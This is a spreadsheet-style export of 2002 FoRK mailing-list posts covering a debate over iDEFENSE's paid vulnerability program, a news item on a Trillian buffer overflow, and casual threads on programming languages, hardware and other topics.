| CERT in the late 1980s, which its proponents might call "responsible
| disclosure" --- never release working exploit code, and never release
| any information on the vulnerability before all vendors have released
| a patch.  This procedure often left hundreds of thousands of computers
| vulnerable to known bugs for months or years while the vendors worked
| on features, and often, even after the patches were released, people
| wouldn't apply them because they didn't know how serious the problem
| was.
| 
| The underground computer criminal community would often discover and
| exploit these same holes for months or years while the "responsible
| disclosure" process kept their victims, who had no connections in the
| underground, vulnerable.
| 
| The problem with this is that vulnerabilities that are widely known
| are much less dangerous, because their victims can take steps to
| reduce their potential impact --- including disabling software,
| turning off vulnerable features, filtering traffic in transit, and
| detecting and responding to intrusions.  They are therefore much less
| useful to would-be intruders.  Also, software companies usually see
| security vulnerabilities in their software as PR problems, and so
| prefer to delay publication (and the expense of fixing the bugs) as
| long as possible.
| 
| iDEFENSE is offering a new alternative that appears far more dangerous
| than either of the two previous paradigms.  They want to be a buyer in
| a marketplace for secret software vulnerability information, rewarding
| discoverers of vulnerabilities with cash.  
| 
| Not long before, Snosoft, a group of security researchers evidently
| including some criminal elements, apparently made an offer to sell the
| secrecy of some software vulnerability information to the software
| vendor; specifically, they apparently made a private offer to
| Hewlett-Packard to keep a vulnerability in HP's Tru64 Unix secret if
| HP retained Snosoft's "consulting services".  HP considered this
| extortion and responded with legal threats, and Snosoft published the
| information.
| 
| If this is allowed to happen, it will cause two problems which,
| together, add up to a catastrophe.
| 
| First, secret software vulnerability information will be available to
| the highest bidder, and to nobody else.  For reasons explained later,
| I think the highest bidders will generally be organized crime
| syndicates, although that will not be obvious to the sellers.
| 
| Second, finding software vulnerabilities and keeping them secret will
| become lucrative for many more talented people.  The result will be
| --- just as in the "responsible disclosure" days --- that the good
| guys will remain vulnerable for months and years, while the majority
| of current vulnerabilities are kept secret.
| 
| I've heard it argued that the highest bidders will generally be the
| vendors of the vulnerable software, but I don't think that's
| plausible.  If someone can steal $20 000 because a software bug lets
| them, the software vendor is never held liable; often, in fact, the
| people who administer the software aren't liable, either --- when
| credit card data are stolen from an e-commerce site, for example.
| Knowing about a vulnerability before anyone else might save a web-site
| administrator some time, and it might save the software vendor some
| negative PR, but it can net the thief thousands of dollars.
| 
| I think the highest bidders will be those for whom early vulnerability
| information is most lucrative --- the thieves who can use it to
| execute the largest heists without getting caught.  Inevitably, that
| means organized crime syndicates, although the particular gangs who
| are good at networked theft may not yet exist.
| 
| There might be the occasional case where a market leader, such as
| Microsoft, could make more money by giving their competitors bad PR
| than a gang could make by theft.  Think of a remote-root hole in
| Samba, for example.
| 
| Right now, people who know how to find security exploits are either
| motivated by personal interest in the subject, motivated by the public
| interest, motivated by a desire for individual recognition, or
| personally know criminals that benefit from their exploits.  Creating
| a marketplace in secret vulnerability information would vastly
| increase the availability of that information to the people who can
| afford to pay the most for it: spies, terrorists, and organized crime.
| 
| Let's not let that happen.
| 
| 
| 
| 
| This is the original iDEFENSE announcement:
| 
| From: Sunil James [mailto:SJames@iDefense.com]
| Sent: Wednesday, August 07, 2002 12:32 PM
| Subject: Introducing iDEFENSE's Vulnerability Contributor Program
| 
| 
| Greetings,
| 
| iDEFENSE is pleased to announce the official launch of its Vulnerability
| Contributor Program (VCP). The VCP pays contributors for the advance
| notification of vulnerabilities, exploit code and malicious code.
| 
| iDEFENSE hopes you might consider contributing to the VCP. The following
| provides answers to some basic questions about the program:
| 
| Q. How will it work?
| A. iDEFENSE understands the majority of security researchers do not publish
| security research for compensation; rather, it could be for any of a number
| of motivations, including the following:
| 
|          * Pure love of security research
|          * The desire to protect against harm to targeted networks
|          * The desire to urge vendors to fix their products
|          * The publicity that often accompanies disclosure
| 
| The VCP is for those who want to have their research made public to the
| Internet community, but who would also like to be paid for doing the
| work.The compensation will depend, among other things, on the following
| items:
| 
|          * The kind of information being shared (i.e. vulnerability or exploit)
|          * The amount of detail and analysis provided
|          * The potential severity level for the information shared
|          * The types of applications, operating systems, and other
|            software and hardware potentially affected
|          * Verification by iDEFENSE Labs
|          * The level of exclusivity, if any, for data granted to iDEFENSE
| 
| Q. Who should contribute to the VCP?
| A. The VCP is open to any individual, security research group or other
| entity.
| 
| Q. Why are you launching this program?
| A. Timeliness remains a key aspect in security intelligence. Contributions
| to some lists take time before publication to the public at large. More
| often, many of these services charge clients for access without paying the
| original contributor. Under the iDEFENSE program, the contributor is
| compensated, iDEFENSE Labs verifies the issue, and iDEFENSE clients and the
| public at large are warned in a timely manner.
| 
| Q. Who gets the credit?
| A. The contributor is always credited for discovering the vulnerability or
| exploit information.
| 
| Q. When can I contribute?
| The VCP is active. You are welcome to begin contributing today.
| 
| To learn more, go to http://www.idefense.com/contributor.html. If you have
| questions or would like to sign up as a contributor to the VCP, please
| contact us at contributor@idefense.com.
| 
| Regards,
| 
| Sunil James
| Technical Analyst
| iDEFENSE
| 
| "iDEFENSE is a global security intelligence company that proactively
| monitors sources throughout the world -- from technical vulnerabilities and
| hacker profiling to the global spread of viruses and other malicious code.
| The iALERT security intelligence service provides decision-makers, frontline
| security professionals and network administrators with timely access to
| actionable intelligence and decision support on cyber-related threats.
| iDEFENSE Labs is the research wing that verifies vulnerabilities, examines
| the behavior of exploits and other malicious code and discovers new
| software/hardware weaknesses in a controlled lab environment."
| 
| http://xent.com/mailman/listinfo/fork
| -- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Didn't we just have a discussion on FoRK how hard
it is nowadays to write something that's not
buffer overflow protected? http://news.zdnet.co.uk/story/0,,t269-s2121250,00.htmlLocation: http://news.zdnet.co.uk/story/0,,t269-s2121250,00.html IM client vulnerable to attack 
IM client vulnerable to attack James Pearce, ZDNet Australia  Users of messenger client Trillian are vulnerable to attack, according to
information security analyst John Hennessy.Hennessy has published a proof-of-concept showing the latest version of
Trillian, v0.73, is vulnerable to a buffer-overflow attack that will
allow individuals with malicious intent to run any program on the
computer.Trillion is a piece of software that allows you to connect to ICQ, AOL
Instant Messenger, MSN Messenger, Yahoo! Messenger and IRC with a single
interface, despite some companies actively avoiding messenger
interoperability.According to Jason Ross, senior analyst at amr interactive, in June 2002
there were 28,000 home users of Trillian in Australia, about 0.4 percent
of the Internet population, and 55,000 people using it at work, about 1.8
percent of the Internet population.David Banes, regional manager of Symantec security response, told ZDNet
Australia the code appeared to be valid."With these sort of things you have to find some process that would
accept a connection, then throw loads of random data at it and get it to
crash," he said. "Once it's crashed, you can try to find a way to exploit
it."He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piece.""Because people are pushed for productivity you tend to leave out the
checks and balances you should put in, which is why we have all these
buffer overflows and exploits out there now," said Banes.Cerulean Studios, creator of Trillian, was contacted for comment but had
not responded by the time of publication.------------------------------------------------------------------------For all security-related news, including updates on the latest viruses,
hacking exploits and patches, check out ZDNet UK's Security News Section.Have your say instantly, and see what others have said. Go to the
Security forum.Let the editors know what you think in the Mailroom.Copyright Â© 2002 CNET Networks, Inc. All Rights Reserved. 
ZDNET is a registered service mark of CNET Networks, Inc. ZDNET Logo is a service mark of CNET NETWORKS,
Inc.
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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France.GregChuck Murcko wrote:&gt;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t>
  </si>
  <si>
    <t>Doom 3 will be based on a peer to peer architecture says
CmdrTaco quoting Ant quoting Carmack.  Greghttp://slashdot.org/article.pl?sid=02/08/25/1310220DOOM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
  </si>
  <si>
    <t>I finally let go of my Irix Magic desktop and window manager
and evaluated several other window managers. Having lost my 10 years
of customization with my X10 and then X11 desktop at one point
at UCI, I promised myself that I'd never get attached to
another WM.  I limped along in the default Gnome desktop, I
had a few unsuccessful stabs at the Solaris open view 
desktop, but nothing really stuck.   Because of this along
with SGI's love of pre-configured, pre-compiled freeware[1],
I never really made the jump from Irix to Linux either.  After installing the enlightenment WM, I have to say, I am
really enlightened.  It's definitely a far cry from the no frills
first look from previous versions.  It's only on version 0.17,[2]
but it's a careful balance between simplicity, performance,
(fun) features, applications, and ease of customization.  The
number of themes they have on freshmeat is amazing. [3] After
less than an hour or two of "nesting" I already have almost
all my menus and controls setup just the way I want. I definitely recommend this to any Irix desktop holdouts.  It's
a great way to refresh your machine SGI without having to bite the
bullet and rebuild it as a Linux machine. Greg[1] http://freeware.sgi.com/
[2] http://www.enlightenment.org/
[3] http://themes.freshmeat.net/browse/60/?topic_id=60
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>More articles that support my fantasy that Irvine is the
center of the universe.  We've got the corner on electric
cars, fuel cells, two types of Nobel winning physics,
outside the box computer science, and lot of creative writers.UCI's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</si>
  <si>
    <t xml:space="preserve">This message was sent to you from http://www.idg.netGeege would like you to read the story below:http://www.idg.net/gomail.cgi?id=940026Title:
A first look at the 2.8-GHz Pentium 4Summary:
Latest Rambus memory plus fast bus appear to give Intel's newest P4 the jolt it needs.Geege attached the following message:
------------------------------------------------------------
ha ha ha harley.  rambus earns it.
------------------------------------------------------------Stay on top of the world of Information Technology with your own
FREE subscription to our specialized newsletters. Subscribe now
at http://www.idg.net/subscribe
7132
</t>
  </si>
  <si>
    <t>On Tue, 2002-08-20 at 15:01, Ian Andrew Bell wrote:
&gt; 
&gt; Yet, despite all of this intense regulation and paper pushing, as 
&gt; well as regulatory scrutiny by the FTC, SEC, and IRS, the 
&gt; executives of Telecom Companies have managed to bilk the investment 
&gt; community for what looks to be tens of billions of dollars.  
This is a good thing.  Getting hammered for stupid investments is likely
to result in smarter investments in the future.  Nobody is supposed to
win all the time, particularly not people who don't do due diligence. 
"A fool and his money are soon parted" and all that.  It isn't the job
of the FTC/SEC/IRS/etc to make sure you invest your money wisely (and I
have grave doubts that they could even if it was their job). 
&gt; They 
&gt; finished their routine with the a quadruple lutz -- laying off 
&gt; hundreds of thousands of workers when it all came crashing down.
So what?  Nobody is guaranteed employment.  Laying people off is not a
crime nor is it immoral.  Companies don't exist to provide employment,
nor should they.  The closest we have to such a thing in the US is a
Government Job, and look at the quality THAT breeds. 
&gt; So.. tell me again.. how are we better off?
Perhaps it is just a matter of personal preference, but I'd rather not
live in a "feed lot" society, thank-you-very-much.
-James Rogers
 jamesr@best.com</t>
  </si>
  <si>
    <t>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trappings.-James Rogers
 jamesr@best.com</t>
  </si>
  <si>
    <t>Jim Whitehead wrote:
&gt; So, after shutting off the water and mopping up, I was left to ponder what
&gt; are the odds of having mechanical failure of a large rectangular porcelain
&gt; bowl, in the absence of any visible stressors (like someone striking it with
&gt; a sledgehammer)? We hadn't done anything unusual to the toilet in the recentAll it takes is an overtorqued nut (e.g. at the water intake entrance)
to stress the porcelain, and you've got a time bomb waiting to go off.
Of course, if you're lucky, you'll overtorque it enough that the tank
will break right away, while you still have the water intake shut off.- Joe</t>
  </si>
  <si>
    <t>John Hall:
&gt;Ran across a site which claimed to explain the original meaning of the
&gt;Ten Commandments.  It seems some of those meanings have evolved a bit, too.You mean that "Thou shalt not covet thy neighbour's ass" used to be
about donkeys???  Inconceivable!!!R</t>
  </si>
  <si>
    <t>On Mon, 26 Aug 2002, Joseph S. Barrera III wrote:&gt; Adam L. Beberg wrote:
&gt; &gt; Fair use needs to be clarified a bit
&gt;
&gt; That's an understatement!!!Yes, it is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member.Forwarding me stuff from a list is hardly handing me a job. I tracked them
down, they dont exist anymore, like 99% of the things I track down the req's
are pulled or there is a freeze.The real problem is you cant even train for jobs now, since they _demand_
7-10 years at a job paid to do the wierd collection of skills they want.But I'll get lucky eventually and someone I know will be a hiring manager.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com</t>
  </si>
  <si>
    <t>Adam L. Beberg wrote:
 &gt; Forwarding me stuff from a list is hardly handing me a job.I was talking about the open reqs at Kana (the company I work for).
Oh, but programming in Java is beneath you.- Joe</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 26 Aug 2002, Geege wrote:&gt; Latest Rambus memory plus fast bus appear to give Intel's newest P4 the jolt it needs.Well, Athlon FSB 333 is almost there. And I'm really looking forward to 
the Hammer series.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 26 Aug 2002, Geege wrote:&gt; Summary:
&gt; Latest Rambus memory plus fast bus appear to give Intel's newest P4 the
&gt; jolt it needs.
&gt;
&gt; Geege attached the following message:
&gt; ------------------------------------------------------------
&gt; ha ha ha harley.  rambus earns it.
&gt; ------------------------------------------------------------"Expect a 3 percent to 5 percent boost with PC1066"5% faster for only 4 times [pricewatch at 7:55PM - 93 vs 379] the cost.Gimme gimme gimme! And I better get the full 5% speedup.And gime me that 20% faster GeForce 4600 at twice the cost of the 4200 too.Seriously, who falls for this scam?P.S. finished the PS2 port, it benchmarks at fp:1 int:40. a celeron 525
benches at fp:460 int:400... If it's not a polygon fill the thing is
useless. There will be no beowolf cluster of these. It is 3x faster then
the iPaq tho at 1/13 :)- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
What are you trying to sell???? What is the Value???Example...Does Pratchett sell paper bound by glue or does he sell stories?Question...When I buy a book have I purchased the story? When I sell the
book does any of that revenue go to mr Pratchett?What if I read the book and  give it to someone, who then reads it
and gives it  to someone who then reads it and gives it to
someones....(bookcrossing.com though with  more succesfull passings). Does
each reader send Mr Pratchett money?Have Used Bookstores, Recorstores etc destroyed the system of book/record
economy?AS to the resident sourpuss, in germany bitter may be better but here its
just plain stinkin thinkin.
-tom
</t>
  </si>
  <si>
    <t xml:space="preserve">(Via Robot Wisdom)   Maybe you UC folk know these people?http://www.eurekalert.org/pub_releases/2002-08/lcc-sph082202.phpWorking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discovered that the gecko's adhesive depends on geometry, not surface 
chemistry. In other words, the size and shape of the tips of gecko foot 
hairs--not what they are made of--determine the gecko's stickiness.To verify its experimental and theoretical results, the gecko group then 
used its new data to fabricate prototype synthetic foot-hair tips from two 
different materials."Both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 </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Bottom line: the late Senate Minority Leader certainly would have 
&gt; endorsed the meaning behind the phrase, but it is questionable that he 
&gt; ever coined it.An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http://www.dirksencenter.org/featuresBillionHere.htm"A billion here, a billion there . . ."Did Dirksen ever say, " A billion here, a billion there, and pretty soon 
you're talking real money"? (or anything very close to that?)Perhaps not. Based on an exhaustive search of the paper and audio 
records of The Dirksen Congressional Center, staffers there have found 
no evidence that Dirksen ever uttered the phrase popularly attributed to 
him.Archivists undertook the search after studying research statistics 
showing that more than 25 percent of inquiries have to do with the quote 
or its variations.Here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hazard."Not knowing what to do with it, they sat down on the curb and had a 
conference. After a while, one of the fellows snapped his fingers and 
said, â€˜I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me a story 
about a proposition that a teacher put to a boy. He said, â€˜Johnny, a cat 
fell in a well 100 feet deep. Suppose that cat climbed up 1 foot and 
then fell back 2 feet. How long would it take the cat to get out of the 
well?'"Johnny worked assiduously with his slate and slate pencil for quite a 
while, and then when the teacher came down and said, â€˜How are you 
getting along?' Johnny said, â€˜Teacher, if you give me another slate and 
a couple of slate pencils, I am pretty sure that in the next 30 minutes 
I can land that cat in hell.'"If some people get any cheer our of a $328 billion debt ceiling, I do 
not find much to cheer about concerning it." [Congressional Record, June 
16, 1965, p. 13884].
But there are no such reminders for the "A billion here, a billion 
there . . . " tag line as there surely should have been given Dirksen's 
note-making tendencies. He spoke often and passionately about the debt 
ceiling, federal spending, and the growth of government. Yet there is no 
authoritative reference to the "billion" phrase.The chief evidence in support of Dirksen making the statement comes from 
people who claim to have heard him. The Library of Congress, for 
example, cites someone's personal observation on the campaign trail as 
evidence. The Dirksen Center has received calls from people who heard 
Dirksen say those words, some even providing the date of the event. But 
cross-checking that information with the records has, so far, turned up 
nothing in the way of confirmation.The closest documented statement came at a joint Senate-House Republican 
leadership press conference on March 8, 1962, when Dirksen said, "The 
favorite sum of money is $1 billion â€“ a billion a year for a fatter 
federal payroll, a billion here, a billion there." [EMD Papers, 
Republican Congressional Leadership File, f. 25] But the "and pretty 
soon you're talking real money" is missing.In another close call, the New York Times, January 23, 1961, quoted 
Dirksen: "Look at education â€“ two-and-one-half billion â€“ a billion for 
this, a billion for that, a billion for something else. Three to five 
billion for public works. You haven't got any budget balance left. 
You'll be deeply in the red." [Cited in Byron Hulsey's "Everett Dirksen 
and the Modern Presidents," Ph.D. dissertation (May 1998, University of 
Texas, p. 226]Of course, the Dirksen Papers do not document completely the late 
Senator's comments. For example, The Center that bears his name does not 
have his testimony before committees. Their collection of Congressional 
Records ends in 1965, omitting the last four years of Dirksen's life and 
career â€“ he might have employed the phrase only late, although witnesses 
claim he said it throughout his career. Dirksen's campaign speeches 
tended not to produce transcripts, only sketchy notes or abbreviated 
newspaper accounts. Dirksen also held center stage before the video age, 
meaning that many remarks, particularly those in campaigns, escaped 
capture.Bottom line: the late Senate Minority Leader certainly would have 
endorsed the meaning behind the phrase, but it is questionable that he 
ever coined it.Â Â 
---
My permanent email address is khare@alumni.caltech.edu
</t>
  </si>
  <si>
    <t xml:space="preserve">
UW Email Robot said:&gt; What is MIME?I know what MIME is godammit ;)&gt; Since MIME is only a few years old, ...a *few*?  Time to update pine-robot-blurb.txt on
docserver.cac.washington.edu, I think.Has anyone figured out what's up with this?  Does someone out there think
that FoRK needs some MIME tutoring?--j.</t>
  </si>
  <si>
    <t>Justin Mason writes:
&gt; Has anyone figured out what's up with this?  Does someone out there
&gt; think that FoRK needs some MIME tutoring?I was puzzled at first, but I think I understand what happened.First, I approved the post because it didn't appear to be spam, even
though it wasn't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constraints.)But I think what actually happened is that some idiot got infected by
Klez and had both FoRK and the pine-robot autoresponder address in their
mailbox or addressbook, so Klez forged mail from fork@xent.com to the
autoresponder, which responded.  To FoRK.</t>
  </si>
  <si>
    <t>&gt; Now, to do this, we all know they have to be cracking the strong crypto used
&gt; on all transaction in order to process them... So this has some preaty heavy
&gt; implications, unless it's just BS.Anybody buying a box like this is undoubtledly going to integrate it into their
crypto infrastructure.  What's the point of putting in a box like this if it's
not an active participant in your security framework?&gt; Or.... you could just not bloat it 20x to begin with. Nah! (that was the
&gt; whole point of XML afterall, to sell more CPUs - much like Oracle's use of
&gt; Java allows them to sell 3x more CPU licenses due to the performance hit)Blah, blah, blah.  The marketing FUD gets compounded by the Beberg FUD, talk
about 20x bloat.&gt; Again, see above... they _are_ claiming to decode the crypto...What gives you the impression that's what they're doing?  That's not what the
text says.  It's largely fluff anyway.&gt; &gt; "Our XG3 execution core converts XML to machine code," said Kelly,
&gt; Mmmmmmmmmmm, machine code, never a good idea ;)Uhhh, fundamentally it's all machine code.  Kelly's comment seems more like
drivel from a clueless marketroid than anything of technical concern.Having what appears to be a silicon XML router would be a cool thing.  Having
one integrated with your crypto environment would kick ass.  Let it
deserialize/decrypt/repackage the XML before handing it off to the app servers.
The question, of course, is does it work with actual applications in the field
without tremendously reworking them.  Somehow I doubt it...-Bill Kearney</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "O" == Owen Byrne  writes:    O&gt; From the local paper this morning.  "Canadians eat about seven
    O&gt; times as many doughnuts per capita"... (as Americans) . D'oh!If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buy.The USA is a nation founded on creative free enterprise entrepreneurs;
Canada is a nation built on monopolies.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy:
&gt;If we had more variety of franchise food than
&gt;the Wendys/KFC/PizzaHut/TacoBell/TimHorton's monopoly .. The USA is a 
&gt;nation founded on creative free enterprise entrepreneurs; Canada
&gt;is a nation built on monopolies.Things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weather.Personally, I almost never eat at a franchise
restaurant. Usually you can find better fare or
cheaper fare (and often both!) at a local
restaurant._________________________________________________________________
Join the worldï¿½s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com
</t>
  </si>
  <si>
    <t>JoeBar wrote:
&gt;C is more reliable than Java??Depends who writes it.  One guy will write a bug every 5 lines,
another every 5000 lines.  Put them both on a project and that will
average out to a bug every 4.995 lines.
(Irrespective of language.  Pick the one
that best suits what you're trying to do.)R</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Russell Turpin  writes:    R&gt; Things aren't all that bad. I remember Vancouver as having a
    R&gt; broad variety of good, local eateries.  And Toronto as having a
    R&gt; variety of good, local strip joints. ;-) I haven't been to Van in years, but I do know that in Toronto, outside
of the small deeply ethnic neighbourhoods, if you stray more than 50
feet from Wellesley and Jarvis or Queen and Spadina, you're in
doughnutland; there's far more like the eateries in the Eaton Centre
than there are quaint cafes like McCaul north of Dundas, and the rare
little eateries are not brimming with lunchtime traffic (you can still
find a seat at noon at Village by the Grange)When most of Toronto does not live in those neighbourhoods but instead
lives in Scarborough, Malton, Mississauga and Markham (franchisevilles), you
will quickly see that one or two trendy strips does not save an entire
nation.
-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley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Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t>Mike Masnick wrote:
&gt;Why is it that people don't understand that giving stuff away is a 
&gt;perfectly acceptable tactic in capitalist businesses?  In many places, it's 
&gt;called "advertising": "buy one, get one free"I'll just take the free one, OK?No?Oh, so actually it's not free at all; you're just bundling, with a unit
price half of what's advertised.How about some truth in that advertising?R</t>
  </si>
  <si>
    <t>GLM wrote:
&gt;And a Java program, due to the extensive class libraries, will weigh
&gt;in at 10% the number of lines of the equivalent C program.  QED.Quod erat not demonstrandum at all.There are massive amounts of libraries for C, Fortran and so on.
To pick an obvious example., if you want to do linear algebra, then
Java isn't a serious candidate at all.Furthermore, plenty of bugs occur in the libraries too, at a lower
rate due to more users having been bitten by them, but they are much
harder for you to fix than in your own code.Why do so many people outside of Sun's marketing department consider
Java to be "Write Once, Debug Everywhere" ?R</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-08-27 at 08:58, Joseph S. Barrera III wrote:
&gt;
&gt; C is more reliable than Java??
Both are reliable.  "Reliability" is more a function of the software
engineer.  I've written complicated mission-critical server software in
Java that will run without a hiccup as long as the Unix box it is
sitting on is running.  Same with C.  For processes that are running
months at a time, and in my case constantly touching databases and doing
lots of low-level network stuff, reliability is obtained by making sure
every conceivable problem (and problems you didn't conceive of) recovers
to a clean/safe process state so that things keep running i.e. it is a
design/programming issue.That said, we usually prototype serious systems in Java and then
re-implement them in C if we have time.  Java doesn't scale well as a
language for server apps, though not for the reasons usually offered. 
The problem is that for high-end server apps, you really need fairly
detailed and low-level control of system resources to get around
bottlenecks that show up relatively quickly in languages that don't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aren't limited by
raw performance scalability.
-James Rogers
 jamesr@best.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Great, this is half of what I'd need to become Spider Man! Now all I need to
figure out is how to do that spider web shooting thing.- Jim&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
&gt; Eirikur Hallgrimsson
&gt; Sent: Monday, August 26, 2002 10:24 PM
&gt; To: FoRK
&gt; Subject: Gecko adhesion finally sussed.
&gt;
&gt;
&gt; (Via Robot Wisdom)   Maybe you UC folk know these people?
&gt;
&gt; http://www.eurekalert.org/pub_releases/2002-08/lcc-sph082202.php
&gt;
&gt; Working at Lewis &amp; Clark College, the University of California at
&gt; Berkeley,
&gt; the University of California at Santa Barbara, and Stanford University,
&gt; the interdisciplinary team:
&gt;
&gt;     * confirmed speculation that the gecko's amazing climbing ability
&gt; depends on weak molecular attractive forces called van der Waals forces,
&gt;
&gt;     * rejected a competing model based on the adhesion chemistry of water
&gt; molecules, and
&gt;
&gt; * discovered that the gecko's adhesive depends on geometry, not surface
&gt; chemistry. In other words, the size and shape of the tips of gecko foot
&gt; hairs--not what they are made of--determine the gecko's stickiness.
&gt;
&gt; To verify its experimental and theoretical results, the gecko group then
&gt; used its new data to fabricate prototype synthetic foot-hair tips
&gt; from two
&gt; different materials.
&gt;
&gt; "Both artificial setal tips stuck as predicted," notes Autumn, assistant
&gt; professor of biology at Lewis &amp; Clark College in Portland, Ore. "Our
&gt; initial prototypes open the door to manufacturing the first biologically
&gt; inspired dry, adhesive microstructures, which can have widespread
&gt; applications."
</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve">So, a new family moved in down the street, with two kids, making us very
excited that there might be a child around the same age (20 months) as our
daughter Tatum. While we're talking to the family, we discover that their
daughter Kiara was born the same day as Tatum, within two hours, in the same
exact maternity ward. Both mothers were undoubtedly in labor at the same
time.Wow.- Jim
</t>
  </si>
  <si>
    <t>At 10:34 AM -0700 on 8/28/02, Jim Whitehead wrote:
&gt; Great, this is half of what I'd need to become Spider Man! Now all I need to
&gt; figure out is how to do that spider web shooting thing....That and be able to stick yourself upside down on a 20 foot ceiling from
a standing jump...I remember someone recently doing the calculations in kilocalories required
to be spiderman somewhere. Kind of like those flaming processor "analyses"
done a couple of years ago...Cheers,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</si>
  <si>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 xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley  writes:    R&gt; GLM wrote:
    &gt;&gt; And a Java program, due to the extensive class libraries, will
    &gt;&gt; weigh in at 10% the number of lines of the equivalent C
    &gt;&gt; program.  QED.    R&gt; There are massive amounts of libraries for C, Fortran and so
    R&gt; on.  To pick an obvious example., if you want to do linear
    R&gt; algebra, then Java isn't a serious candidate at all.If you want to do http, C gets pretty muddy (curl is about the best
choice I've found) but I grant you that: No language is the be-all and
end-all.I envy some of those posting to this list.  I've been in business for
24 years and I haven't yet had the luxury of writing every line of
code for any project. We are always coerced by budgets and time to
maximize the amount of work done elsewhere.  As much as I hate dealing with someone else's blackbox, as much as
I've spent sleepless nights second-guessing external libs, I've never
ever had the luxury to do otherwise. It must be wonderful to be
responsible for something you are actually responsible for, and I am
so sick of being blamed for other people's design mistakes.Maybe there's an archive somewhere I need to know about, but I've been
using C since DrDobbs first published SmallC and yet I've never found
any decent LGPL libs cataloged in such a way that I can just type in
the task and get back an API.  Because of Javadoc, which is by no
means perfect, Java provides me the second best catalog of 3rd-party
libs, second only to Perl's CPAN -- Perl is one language I also really
hate with a passion, yet end up using the most for exactly this reason.For example, take the recent CBC Olympics site: I needed to roll
together a telnet client with a tokenizer, perl-regex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read-only http socket
which can spawn persistent data-caching servlets that periodically
refresh themselves over socket connections to the relational database,
presenting the retreived values through XSLT-defined transforms, and
again, where can I find such stuff for C ... or for any other langauge
but Java?  Wombat (servlet spec for Perl) was inviting, but it's not
ready for prime-time, and re-inventing that entire shopping list in C
is just not feasible for one programmer to do inside of 8 weeks.When you need C libs, or even C++ libs, where's the best place to shop?
Where do you find standards-based portable RDBMS API? (ODBC?) How do
you evaluate these things without actually fetching every one and
trying it out?In a perfect universe, I'd use Ocaml or even Ruby, but I don't see the
social infrastructure for either happening during my professional
lifetime.    R&gt; Why do so many people outside of Sun's marketing department
    R&gt; consider Java to be "Write Once, Debug Everywhere" ?A collegue at Cognos (Henk?) called C "the nearly-portable assembler"-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t>First seen on Dave Winer's Scrpiting News (www.scripting.com) Details here:http://www.digichapman.com/index.php?permalink=67- Jim</t>
  </si>
  <si>
    <t xml:space="preserve">It's official, the holidays are here.  I got HTML mail from one of the 
little catalogs I've been known to purchase from....basically the front 
page of their first holiday catalog. Must have been released simultaneously with mailing for a delivery target 
of just after Labor Day.Ick.Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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components?You open sourced the new components you developed for this project, so the
next person who comes along won't have to reimplement them, right?- Jim
</t>
  </si>
  <si>
    <t>We met a family in our parent-baby group with a son born a few minutes
before our daughter - not unlikely as all members were from the same
hospital. But, this family happened to have lived in the exact same
apartment unit a year before we had...----- Original Message -----
From: "Jim Whitehead" 
To: "FoRK"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
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Jim Whitehead  writes:    J&gt; You open sourced the new components you developed for this
    J&gt; project, so the next person who comes along won't have to
    J&gt; reimplement them, right?No need: All those components already exist either in the Java
class libraries or from the various java jar collections.  Most
of the classes I used came from the Jakarta project and ApacheXMLBut if it's any consolation, my threading of them all together into
a newswire server /is/ GPL and available on sourceforge.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t>Eirikur Hallgrimsson wrote:
&gt; It's official, the holidays are here.For which year, 2003 or 2004?- Joe</t>
  </si>
  <si>
    <t xml:space="preserve">Gary's news service at teledyn.com has an article on Internet Saturation.Let me ask you....If you were on a rock in the middle of the Atlantic, 
mostly in the dark for half the year, wouldn't *you* like a bit of 
internet distraction?   They've already done the obvious and fiber-ringed 
the island.Eirikur--------Latest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far.http://www.nua.ie/surveys/how_many_online/
</t>
  </si>
  <si>
    <t xml:space="preserve">
Gary Lawrence Murphy said:&gt;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licensing-wise.Also, cutting out third-party dependencies can reduce the risk of "oops,
there goes the company that makes that library I depend on, now to shop
around for something vaguely similar, figure out what bugs it's got,
rewrite my code to use the new API, and hope for the best".This can be a *very* big deal, for obvious reasons ;)    Open source
knockers should note that this is not a problem when using LGPL'd libs ;)--j.</t>
  </si>
  <si>
    <t xml:space="preserve">
Eirikur Hallgrimsson said:&gt; Let me ask you....If you were on a rock in the middle of the Atlantic, 
